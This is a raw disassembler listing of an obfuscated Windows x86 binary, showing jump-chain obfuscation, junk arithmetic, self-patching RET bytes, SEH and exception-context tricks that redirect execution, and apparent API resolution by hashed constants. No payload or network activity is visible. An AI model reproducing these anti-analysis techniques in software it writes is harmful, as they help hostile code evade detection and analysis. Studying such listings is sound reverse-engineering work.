loc_44F5FE:				; CODE XREF: sub_43D0A9:loc_44BE39j
		mov	eax, [esp-4+arg_0]
		push	edx
		nop
		push	58EC8976h
		pop	eax
		sub	eax, ds:4000F3h
		jmp	loc_44F847
; END OF FUNCTION CHUNK	FOR sub_43D0A9

; =============== S U B	R O U T	I N E =======================================



sub_44F614	proc near		; CODE XREF: k2vbe3.d:0044C863j
					; sub_44CA34+E516p

; FUNCTION CHUNK AT 00442941 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BB70 SIZE 00000016 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		sub	eax, 14AC407Bh

loc_44F61E:				; CODE XREF: sub_44CA34-5AE9j
		rol	eax, 12h
		sub	eax, 0AB67E9E7h
		rol	eax, 9
		jmp	loc_442941
sub_44F614	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44F62F:				; CODE XREF: k2vbe3.d:0045BB98j
		jp	loc_457B99
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44F635:				; CODE XREF: sub_43F7AC-DDDj
		xor	eax, 1F780129h
		push	edi
		push	offset sub_44B627
		jmp	nullsub_449
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4565F8

loc_44F646:				; CODE XREF: sub_4565F8:loc_4411F1j
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_4565F8
; ---------------------------------------------------------------------------
dword_44F64C	dd 0			; DATA XREF: sub_447692:loc_43C7C7r
					; sub_447692:loc_44C02Cr ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44F650:				; CODE XREF: sub_44C90E-D0AEj
		jmp	nullsub_225
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_44F655	proc near		; CODE XREF: sub_414954+253p
					; sub_414954+26Cp ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004439D9 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BDA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F17 SIZE 00000005 BYTES

		push	eax

loc_44F656:				; CODE XREF: sub_43E135:loc_4403ADj
		push	57B91D00h
		xchg	ebx, [esp+8+var_8]
		mov	eax, ebx
		jmp	loc_458F17
sub_44F655	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_44F665:				; CODE XREF: sub_449067:loc_458AE6j
		lea	eax, loc_4584EE
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F018
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
		push	edx
		push	4C0EB65Ch
		pop	edx
		add	edx, 796F367h
		jmp	loc_453E80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B49

loc_44F685:				; CODE XREF: sub_457B49:loc_457B54j
		jz	loc_448C32
		jmp	loc_459F5F
; END OF FUNCTION CHUNK	FOR sub_457B49
; ---------------------------------------------------------------------------

loc_44F690:				; CODE XREF: k2vbe3.d:00443D40j
		cmp	ebx, 4D2751D1h
		jmp	loc_45B70A
; ---------------------------------------------------------------------------

loc_44F69B:				; CODE XREF: k2vbe3.d:0044F2B0j
		ror	eax, 6
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44F69E:				; CODE XREF: sub_45A323:loc_451CFDj
		add	edx, 12CD107Ah
		xchg	edx, [esp+8+var_8]
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F1C

loc_44F6AC:				; CODE XREF: sub_457F1C+19j
		and	eax, 0C2C0158Fh
		or	eax, 4378B846h
		sub	eax, 5235CFB0h
		add	eax, 7CCD5151h
		call	sub_4553CC
		mov	ds:off_41E098, eax
		push	offset sub_453141
		jmp	nullsub_258
; END OF FUNCTION CHUNK	FOR sub_457F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1A6

loc_44F6D9:				; CODE XREF: sub_44F1A6+AC9Ej
		jz	loc_446E16
		jmp	loc_447DCE
; END OF FUNCTION CHUNK	FOR sub_44F1A6
; ---------------------------------------------------------------------------

loc_44F6E4:				; CODE XREF: k2vbe3.d:0044DE42j
		jle	loc_44B383
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_44F6EA:				; CODE XREF: sub_455BEA:loc_455A64j
		sub	eax, 0CBEA8C68h
		add	eax, 0DAD25109h
		mov	eax, [eax]
		jmp	loc_441843
; END OF FUNCTION CHUNK	FOR sub_455BEA

; =============== S U B	R O U T	I N E =======================================



sub_44F6FD	proc near		; CODE XREF: sub_4534C2-9D1Cp
					; k2vbe3.d:0044D36Ej
		xchg	eax, [esp+0]
		pop	eax
		add	eax, ebp
		push	offset loc_448444
		jmp	nullsub_93
sub_44F6FD	endp


; =============== S U B	R O U T	I N E =======================================



sub_44F70D	proc near		; DATA XREF: sub_4500BB:loc_443E5Ao

; FUNCTION CHUNK AT 0043DC6A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B470 SIZE 00000005 BYTES

		push	47A71A80h
		pop	eax
		sub	eax, 0CBBB4F52h
		or	eax, 0FC1F109h
		jmp	loc_44B470
sub_44F70D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_44F724:				; CODE XREF: sub_451EEA:loc_450F14j
		mov	[esi], eax
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_451EEA
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_44F72C:				; CODE XREF: sub_4506C3+1F4Bj
		lea	eax, loc_4584EE
		mov	byte ptr [eax],	0C3h
; END OF FUNCTION CHUNK	FOR sub_4506C3
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44F735:				; CODE XREF: sub_45A323-7EE9j
		jmp	loc_4584EE
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_44F73A:				; CODE XREF: sub_449067:loc_4584EEj
		xchg	edi, [esp+4+var_4]
		jmp	loc_454D40
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44F742:				; CODE XREF: sub_43DFE1+601Aj
		jg	loc_43FD37

loc_44F748:				; CODE XREF: sub_4597E6:loc_457F8Dj
		call	sub_4436CE
		mov	edx, 0C231F698h
		push	ecx
		push	488A54D8h
		jmp	loc_447A2C
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_44F75D:				; CODE XREF: sub_4582DD-D394j
		movzx	eax, word ptr [eax]
		shl	eax, 2
		mov	edx, [ebp-14h]
		mov	edx, [edx+1Ch]
		jmp	loc_442C69
; END OF FUNCTION CHUNK	FOR sub_4582DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44F76F:				; CODE XREF: sub_44D0D5-436Bj
		jmp	nullsub_146
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
		call	sub_43C04E
		test	al, al
		jz	loc_44464B
		jmp	loc_454D7C
; ---------------------------------------------------------------------------

loc_44F786:				; DATA XREF: k2vbe3.d:loc_456F48o
		xchg	edi, [esp]
		jmp	sub_44A7C2
; ---------------------------------------------------------------------------
		mov	eax, 11E35Ch
		call	sub_4553CC
		mov	ds:dword_41E128, eax
		lea	eax, nullsub_475
		mov	byte ptr [eax],	0C3h
		jmp	loc_44AF61
; ---------------------------------------------------------------------------

loc_44F7AC:				; CODE XREF: k2vbe3.d:0044FA47j
		mov	eax, [esp]
		jmp	loc_45A0A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_44F7B4:				; CODE XREF: sub_454F9F-18F06j
		jz	loc_453900
		jmp	loc_43C9CB
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6EC

loc_44F7BF:				; CODE XREF: sub_44C6EC+1j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:byte_4411F0,	0
		jnz	loc_45B73E
		call	sub_451EB7
; END OF FUNCTION CHUNK	FOR sub_44C6EC
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44F7D6:				; CODE XREF: sub_456541-94B4j
		jg	loc_458B32
		xor	edx, 0B8E34716h
; END OF FUNCTION CHUNK	FOR sub_456541
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44F7E2:				; CODE XREF: sub_449372:loc_43F21Aj
		jmp	sub_4514B7
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		xchg	esi, ebp
		jmp	loc_44C9D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44F7EE:				; CODE XREF: sub_44B94B:loc_44D404j
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jle	loc_45686D
		mov	eax, [ebp-4]
		xor	edx, edx
		push	edx
		push	eax
		mov	eax, [ebp-8]
		jmp	loc_449410
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_44F80A:				; CODE XREF: k2vbe3.d:00452F8Aj
		and	esi, 0DC9A09BFh
		test	edi, edx
		jmp	loc_43F7E7

; =============== S U B	R O U T	I N E =======================================



sub_44F817	proc near		; CODE XREF: sub_446382:loc_43D090p
					; k2vbe3.d:0043F728j ...

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0044DFFC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004540C2 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[esi], eax
		pop	esi
		lea	eax, sub_454BCE

loc_44F824:				; CODE XREF: sub_450F71:loc_45BAD7j
		jmp	loc_4540C2
sub_44F817	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44F829:				; CODE XREF: sub_449372:loc_450736j
		push	ecx
		push	948C7BB1h
		pop	ecx
		sub	ecx, 0AEDC4EB7h
		or	ecx, 12399820h
		add	ecx, 88B7FFAh
		call	sub_44F4D2
; END OF FUNCTION CHUNK	FOR sub_449372
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_44F847:				; CODE XREF: sub_43D0A9+12566j
		jmp	loc_45B8FF
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------

loc_44F84C:				; CODE XREF: k2vbe3.d:00446FBDj
		jmp	loc_43CDE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44F851:				; CODE XREF: sub_4424CF:loc_44C9D4j
		shr	edi, 1Ah
		add	ebp, esi
		cmp	ebp, 1BA0183Bh
		jmp	loc_442518
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4499EC

loc_44F861:				; CODE XREF: sub_4499EC-891Dj
		push	edx
		call	sub_4599AA
		mov	eax, 86B13FACh
		call	sub_43C82E
		mov	ds:off_41E1EC, eax
		lea	eax, loc_4410C5
		jmp	loc_4407EE
; END OF FUNCTION CHUNK	FOR sub_4499EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444944

loc_44F882:				; CODE XREF: sub_444944:loc_44495Cj
		not	eax
		jz	loc_458644
		jmp	sub_4593D6
; END OF FUNCTION CHUNK	FOR sub_444944
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_455. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44F890:				; CODE XREF: sub_43C3A9+159B8j
		jmp	loc_4537A1
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_44F895:				; CODE XREF: sub_442475:loc_4506A0j
		jmp	nullsub_524
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_44F89A:				; CODE XREF: sub_44662B+15j
		jmp	loc_446AC5
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447585

loc_44F89F:				; CODE XREF: sub_447585:loc_455449j
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_43F868
		mov	[ecx+0B8h], eax
		pop	ecx
		jmp	loc_43F865
; END OF FUNCTION CHUNK	FOR sub_447585
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_44F8B8:				; CODE XREF: sub_43E135+4853j
		jmp	loc_45A400
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_44F8BD:				; CODE XREF: sub_457DCA-1A4B9j
					; sub_457DCA:loc_4595C7j
		push	8BDAF352h
		xchg	ecx, [esp+4+var_4]
		mov	eax, ecx
		pop	ecx
		rol	eax, 2
		or	eax, 0B2465FAh
		jmp	loc_4426BB
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E164
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_44F8DC:				; CODE XREF: sub_443A30+C797j
		jmp	loc_45067C
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44F8E1:				; CODE XREF: sub_44B999-6B0Ej
		jmp	loc_456F99
; END OF FUNCTION CHUNK	FOR sub_44B999
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_431. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebp, edx
		add	fs:[eax], al
		xchg	ebp, [esp]
		mov	edx, ebp
		pop	ebp
		mov	eax, [esp]
		jmp	loc_44510F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_44F8FA:				; CODE XREF: sub_440621+6594j
		cmp	edx, 0B458C7A9h
		jmp	loc_4406A1
; END OF FUNCTION CHUNK	FOR sub_440621
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44F905:				; CODE XREF: sub_45A323:loc_4506B4j
		sbb	eax, 9B6435F0h
		mov	ecx, [ebp+0]

loc_44F90E:				; CODE XREF: k2vbe3.d:loc_45B842j
		jg	loc_44C1E5
		jmp	loc_43DC0D
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_44F919:				; CODE XREF: k2vbe3.d:0044BC34j
		jl	loc_44E255
		cmp	edx, 50DB231Ah
		jmp	loc_4433DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44F92A:				; CODE XREF: sub_446E24:loc_440DD7j
		jnz	loc_448DEF
		jmp	loc_44510A
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44F935:				; CODE XREF: sub_456666:loc_446B29j
		mov	[edx], eax
		pop	edx
		lea	eax, sub_442CA7
		mov	byte ptr [eax],	0C3h
		jmp	sub_442CA7
; END OF FUNCTION CHUNK	FOR sub_456666

; =============== S U B	R O U T	I N E =======================================



sub_44F946	proc near		; CODE XREF: sub_4198C0+C8p
					; k2vbe3.d:0044D542j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044A1CA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045810C SIZE 0000000E BYTES

		push	eax
		mov	eax, edx
		jmp	loc_44A1CA
sub_44F946	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_44F94E:				; CODE XREF: sub_457DCA:loc_441271j
		pop	eax
		xor	eax, 0F6B519BCh
		rol	eax, 19h
		add	eax, 6B119BE8h
		xor	eax, 0C98123E0h
		call	sub_43DDA1

loc_44F969:				; CODE XREF: k2vbe3.d:0045AE58j
		or	eax, edi
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_44F96B	proc near		; CODE XREF: k2vbe3.d:004435F7p
		xchg	esi, [esp+0]
		pop	esi
		pop	ebx
		jmp	loc_458A4E
sub_44F96B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45524B

loc_44F975:				; CODE XREF: sub_45524B+Cj
		push	offset loc_456610
		jmp	nullsub_182
; END OF FUNCTION CHUNK	FOR sub_45524B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44F97F:				; CODE XREF: sub_43DFE1+D3A9j
		test	ecx, ebx
		jmp	loc_443FF1
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_44F988:				; CODE XREF: sub_4504F3+27j
		jmp	loc_45BD4E
; END OF FUNCTION CHUNK	FOR sub_4504F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_44F98D:				; CODE XREF: k2vbe3.d:0043CAA3j
					; sub_44B2D7+Dj
		call	sub_43C04E
		test	al, al
		jz	loc_4473E1

loc_44F99A:				; CODE XREF: k2vbe3.d:00450A14j
		jmp	loc_447398
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_44F99F:				; CODE XREF: sub_441D41-3FACj
		sub	eax, 76B31BB8h
		add	eax, 0AF19EF1Ah
		add	eax, ebp
		add	eax, 6BD569F8h
		mov	eax, [eax]
		jmp	loc_45638C
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
		push	ebp
		jmp	sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FA5A

loc_44F9C0:				; CODE XREF: sub_44FA5A+11j
		jnz	loc_44CF2B
		jmp	loc_4408C8
; END OF FUNCTION CHUNK	FOR sub_44FA5A
; ---------------------------------------------------------------------------

loc_44F9CB:				; CODE XREF: k2vbe3.d:0043EF44j
		and	ebx, eax
		ror	ecx, 0Eh
		mov	edx, ebx
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_44F9D2:				; CODE XREF: sub_44DB59+D492j
		and	eax, ebx
		add	ebx, 0D2A75B1Ch
		or	edx, ebx
		pop	eax
		xchg	esi, [esp-8+arg_4]
		jmp	loc_44435D
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_44F9E5:				; CODE XREF: sub_453347:loc_45AAE6j
		jz	loc_453ED2
		jmp	loc_44DD80
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------

locret_44F9F0:				; CODE XREF: k2vbe3.d:loc_43C438j
		retn
; ---------------------------------------------------------------------------
		mov	edx, ebp
		jmp	sub_45051F
; ---------------------------------------------------------------------------

locret_44F9F8:				; CODE XREF: k2vbe3.d:0045963Ej
		retn
; ---------------------------------------------------------------------------
		mov	eax, 0C7CC2482h
		call	sub_4553CC
		push	offset loc_44CB5D
		jmp	loc_43E0E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F22

loc_44FA0D:				; CODE XREF: sub_445F22+12j
		jz	loc_43EE50
		jmp	loc_4591B2
; END OF FUNCTION CHUNK	FOR sub_445F22
; ---------------------------------------------------------------------------

loc_44FA18:				; CODE XREF: k2vbe3.d:0044CB70j
		call	sub_4423A7
; START	OF FUNCTION CHUNK FOR sub_4561EE

loc_44FA1D:				; CODE XREF: sub_4561EE+15j
		jmp	sub_43E282
; END OF FUNCTION CHUNK	FOR sub_4561EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44249A

loc_44FA22:				; CODE XREF: sub_44249A+2B5Cj
		jmp	loc_4466E4
; END OF FUNCTION CHUNK	FOR sub_44249A
; ---------------------------------------------------------------------------

loc_44FA27:				; CODE XREF: k2vbe3.d:0043C880j
		shr	ebp, 4

; =============== S U B	R O U T	I N E =======================================



sub_44FA2A	proc near		; CODE XREF: sub_444966:loc_454427p
		xchg	esi, [esp+0]
		pop	esi
		push	0
		push	4
		lea	eax, [ebp-10h]
		push	ebp
		jmp	loc_45015D
sub_44FA2A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44FA3B:				; CODE XREF: sub_446E24-8BD5j
		jnz	loc_443B4B
		jmp	loc_4480F8
; END OF FUNCTION CHUNK	FOR sub_446E24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_475. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		js	loc_44F7AC
		mov	eax, [esp]
		push	offset sub_45B4B9
		jmp	locret_44389D

; =============== S U B	R O U T	I N E =======================================



sub_44FA5A	proc near		; CODE XREF: k2vbe3.d:0043E614p
					; k2vbe3.d:00449E9Bj

; FUNCTION CHUNK AT 0044F9C0 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_4586B3
		test	eax, eax
		jz	loc_453900
		jmp	loc_44F9C0
sub_44FA5A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	55104B94h
		and	eax, ebx
		jmp	sub_43FFDC
; ---------------------------------------------------------------------------

loc_44FA7C:				; CODE XREF: k2vbe3.d:00450037j
		sub	edx, ecx

; =============== S U B	R O U T	I N E =======================================



sub_44FA7E	proc near		; CODE XREF: k2vbe3.d:loc_43E920p
		xchg	edx, [esp+0]
		pop	edx
		call	sub_44B2D7
		call	nullsub_495
sub_44FA7E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44F028

loc_44FA8C:				; CODE XREF: sub_44F028:loc_442495j
		mov	eax, [ebp-4]
		cmp	dword ptr [eax+4], 0
		ja	loc_455EED
		jmp	loc_456F36
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F1C

loc_44FA9E:				; CODE XREF: sub_458F1C:loc_450DDDj
		xor	eax, 0A47A9F3Ah
		add	eax, 938E5C51h
		xor	eax, 1A51FD51h
		or	eax, 92C9FEAh
		add	eax, 29D37371h
		call	sub_4553CC
		jmp	loc_459E4A
; END OF FUNCTION CHUNK	FOR sub_458F1C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_44FAC7:				; CODE XREF: sub_4507E3-133F2j
		jmp	loc_44DD53
; END OF FUNCTION CHUNK	FOR sub_4507E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_44FACC:				; CODE XREF: sub_44B2D7+BF2Aj
		jnz	loc_455D8C
		adc	edx, esi

loc_44FAD4:				; CODE XREF: k2vbe3.d:0043EC72j
		jnz	loc_43C6BC
		jmp	loc_43EB6A
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		and	edi, eax
		mov	[esi], eax
		jmp	sub_44B495
; ---------------------------------------------------------------------------

loc_44FAE8:				; CODE XREF: k2vbe3.d:00444D26j
		sub	ebx, 0E59B212h
		rol	ebx, 3
		call	sub_44B667
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_44FAF6:				; CODE XREF: sub_451EB7+A404j
		jmp	nullsub_460
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
		cdq
		mov	eax, esi
		jmp	sub_4524D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_44FB03:				; CODE XREF: sub_44D298:loc_456F31j
		js	loc_44B7F7
		sub	edx, 0FA06BD45h
		adc	edi, 0F60547AEh
		jmp	loc_448F35
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_44FB1A:				; CODE XREF: k2vbe3.d:0044EBACj
		xchg	esi, [edx]
		xor	ebx, ecx

loc_44FB1E:				; CODE XREF: k2vbe3.d:loc_44EBA0j
		and	eax, 37B31044h
		add	eax, 324004AFh
		call	sub_4553CC
		push	edx
		push	0D80EDBEh
		jmp	loc_459929
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_44FB3A:				; CODE XREF: sub_43FCA0-28A4j
		cdq
		or	edx, 45FCF147h

loc_44FB41:				; CODE XREF: sub_43FCA0:loc_44C42Bj
		pop	large dword ptr	fs:0
		add	esp, 4
		mov	eax, 52h
		call	sub_44ADEC
		jmp	loc_4506D4
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------
		jmp	loc_451CE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_44FB5F:				; CODE XREF: sub_450983:loc_4550A0j
		popf
		jmp	loc_43DA9C
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44FB65:				; CODE XREF: sub_44C90E:loc_43ECE1j
		test	esi, edi
		jmp	loc_456BA2
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_44FB6C:				; CODE XREF: k2vbe3.d:loc_44AB26j
		push	2784660Ah
		pop	ecx
		xor	ecx, 61BF0965h
		cmp	ecx, 0B7055902h
		jmp	loc_44554C
; ---------------------------------------------------------------------------
		call	nullsub_15
		jmp	ds:dword_41E0C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_44FB8E:				; CODE XREF: sub_441409+CEF3j
		jmp	loc_45A0F7
; END OF FUNCTION CHUNK	FOR sub_441409
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS	KEYPAD "+" TO EXPAND]
		dd 0FFEE1080h, 8102E8FFh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458951

loc_44FB9E:				; CODE XREF: sub_458951-3ED9j
					; k2vbe3.d:loc_455208j
		jmp	loc_444EDA
; END OF FUNCTION CHUNK	FOR sub_458951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449488

loc_44FBA3:				; CODE XREF: sub_449488+Aj
		jmp	loc_447716
; END OF FUNCTION CHUNK	FOR sub_449488
; ---------------------------------------------------------------------------

loc_44FBA8:				; CODE XREF: k2vbe3.d:00441E11j
		jmp	locret_444A72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44FBAD:				; CODE XREF: sub_443FC1-6D5Dj
		jmp	loc_43E6E9
; END OF FUNCTION CHUNK	FOR sub_443FC1

; =============== S U B	R O U T	I N E =======================================



sub_44FBB2	proc near		; CODE XREF: k2vbe3.d:004484F5j
					; sub_4529E2:loc_4599C5p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CE62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A989 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045ADB6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045BFF0 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, 0E231F278h
		add	eax, ebp
		call	sub_449EF8

loc_44FBC3:				; CODE XREF: k2vbe3.d:0045925Cj
		sbb	ebx, ecx
		rol	edx, 10h
		or	edx, ebx
		pop	ebx
		xchg	ecx, [esp-8+arg_4]
		mov	eax, ecx
		jmp	loc_45BFF0
sub_44FBB2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_44FBD5:				; CODE XREF: sub_44660F:loc_452EE9j
		call	sub_44AD44

loc_44FBDA:				; CODE XREF: sub_45B74D-3E22j
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_44660F

; =============== S U B	R O U T	I N E =======================================



sub_44FBDF	proc near		; CODE XREF: k2vbe3.d:004507BAj
					; sub_44FF97+5D98p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044B92E SIZE 0000001D BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [esp+0]
		push	edi
		mov	edi, edx
		jmp	loc_44B92E
sub_44FBDF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44863D

loc_44FBEE:				; CODE XREF: sub_44863D+B76Ej
		jg	loc_441572
		push	129288E1h

loc_44FBF9:				; CODE XREF: sub_44863D+1227Fj
		xor	edi, 0EF9DBAD5h
		rol	edi, 19h
		add	edi, 0B57299C4h
		mov	[edi], eax
		jmp	loc_44A7BD
; END OF FUNCTION CHUNK	FOR sub_44863D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS	KEYPAD "+" TO EXPAND]
